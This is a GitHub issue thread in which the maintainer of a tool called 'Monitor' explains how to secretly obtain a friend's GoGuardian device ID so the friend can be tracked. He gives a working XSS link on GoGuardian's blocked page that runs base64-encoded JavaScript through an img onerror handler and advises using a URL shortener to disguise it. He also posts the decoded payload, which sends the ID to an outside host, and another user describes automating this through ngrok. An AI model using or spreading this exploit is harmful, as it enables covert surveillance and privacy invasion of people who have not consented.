### ISSUE TITLE
How do I get a device id? (non virtual)

### ISSUE THREAD

**Issue by Hellscaped** [mswider/Monitor#4]
I'm trying to track my friends as a joke

**Comment by mswider** [comment]
To get a genuine device ID you're going to need physical access to your friend's computer at some point.
One way I've found is you can open a special link on your friend's computer that tells you their ID.

This link will show a device's ID:
[https://student.goguardian.com/teacher/blocked.html?cs=%5B%7B%22name%22%3A%22Teacher%22%7D%2C%7B%22name%22%3A%22Teacher%3Cimg+src+onerror%3Deval%28atob%28%5C%22KCgpPT57Y2hyb21lLnJ1bnRpbWUuc2VuZE1lc3NhZ2UoJ2hhbGRsZ2xkcGxnbmdna2phYWZoZWxnaWFnbGFmYW5oJyx7bWVzc2FnZTonZ2V0Q29tcFJhbmQnfSx7fSwoZSk9PmFsZXJ0KGUpKTt9KSgp%5C%22%29%29%3E%22%7D%5D](https://student.goguardian.com/teacher/blocked.html?cs=%5B%7B%22name%22%3A%22Teacher%22%7D%2C%7B%22name%22%3A%22Teacher%3Cimg+src+onerror%3Deval%28atob%28%5C%22KCgpPT57Y2hyb21lLnJ1bnRpbWUuc2VuZE1lc3NhZ2UoJ2hhbGRsZ2xkcGxnbmdna2phYWZoZWxnaWFnbGFmYW5oJyx7bWVzc2FnZTonZ2V0Q29tcFJhbmQnfSx7fSwoZSk9PmFsZXJ0KGUpKTt9KSgp%5C%22%29%29%3E%22%7D%5D)

This opens a prompt with the id that looks like this, try to take a picture of it:
![image](https://user-images.githubusercontent.com/37093293/219455270-f3efa59b-ae0b-4265-a108-c90c57886d52.png)

Once you have the ID, open settings and add select "Add Device by ID", and put it there.
You should be able to see their email immediately, but things like their name only load in once they join a class.

Hope this helps!

**Comment by mswider** [comment]
Because the link is super long, you probably want to use a url shortening service to link to it

**Comment by thrailkillr** [comment]
Alright, thanks!

**Comment by thrailkillr** [comment]
Noticed the encoded javascript. Gonna make it auto add them to my instance with some http requests (my instance is running over ngrok)

**Comment by mswider** [comment]
The payload I use looks like this btw if you need a reference:
```javascript
(()=>{chrome.runtime.sendMessage('haldlgldplgnggkjaafhelgiaglafanh',{message:'getCompRand'},{},(e)=>fetch(`https://DOMAIN/c/${e}`));})()
```

I'm considering adding a feature to let Monitor handle stuff like generating a payload and handling those requests automatically but this has worked well so far

**Comment by thrailkillr** [comment]
> The payload I use looks like this btw if you need a reference:
> 
> ```js
> (()=>{chrome.runtime.sendMessage('haldlgldplgnggkjaafhelgiaglafanh',{message:'getCompRand'},{},(e)=>fetch(`https://DOMAIN/c/${e}`));})()
> ```
> 
> I'm considering adding a feature to let Monitor handle stuff like generating a payload and handling those requests automatically but this has worked well so far

yeah I decoded that, it works nicely.

I'm just using that to set a var.

The payload generator sounds great.
